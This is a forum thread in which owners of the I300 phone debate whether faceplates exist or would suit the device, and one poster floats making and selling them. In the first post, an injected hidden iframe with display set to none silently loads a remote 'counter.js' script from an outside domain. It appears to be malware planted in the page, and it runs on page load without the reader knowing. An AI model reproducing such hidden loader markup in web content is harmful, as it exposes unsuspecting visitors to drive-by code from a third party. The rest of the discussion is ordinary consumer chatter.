faceplate

Does anyone know if there are any faceplates for the I300?
I see all these snazzy faceplates for other phones and I certainly don't mind mixing it up with my I300 visually.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No, and I don't think you'll see them. The I300 is in a class of its own. I'd like to think all those novelties and toys are reserved for ....well definately not the I300!

So the I300 is in a class of it's own?
Too good for faceplates?
Faceplates do a better job of protecting the shell of your phone than leather cases. That's a novelty I can live with.
I can see where you're coming from though. I just don't consider my phone to be holier-than-though.

my man MJ is on the money...

this phone would lose its worth if you were to put a faceplate similiar to what MJ posted... my case works just fine for me. of course, there will always be someone to do the radical... enter dubolex's plea.. :p

Lightbulb face plates

I own a i300 and I think that having face plate options would be cool. I wouldn't think that most I 300 users would not use a Scooby doo face plate or the like. I think that good solid colored face plates would be cool. I just happen to be involved in technology that enables me to design and manufacture plastic injected parts. How much of a demand do you think there would be for face plate options?

Thanks,

IC

I think there may be a demand for the screen protectors, a la Sony Clie, but not face plates. And I could obviously be wrong.

Cool plate

I would have to find a machine that is able to cut those kinds of material. Its possible! It would be tremendously expensive to cut. I don't know who would pay for it.

shucks...guess I knew it would be expensive. Some high-end watch makers are doin carbon fiber face plates for their watches (Tag Heur & Breitling) & they really look cool. But to answer your original question, I can't imagine that there wouldn't be a market for WELL DONE faceplates for the I300, I'd buy a few. A lil color for those ...ummm...frivolous days?

I think it's a good idea

I can't measure the demand but it's nice to know that if you want one, it's available. As routb pointed out, I'm more talking about solid colors. Not air-brushed artwork like the Scooby-Doo example but it wouldn't bother me if someone wanted that for their own. I would buy a few myself. Green and jet black .
If companies can sell those holo-grams then I can't see why this wouldn't do well in the market. I look at the other accessories that's designed for this phone and faceplates just seem like a natural addition. Especially since they protect your phone. Just an opinion.

My Faceplate Shows Wear

Unfortunately I waited too long to get a decent case and kept using the one that came with the phone. It wore off the silver paint off the front and my phone now looks older than most. A faceplate sounds like a good idea!
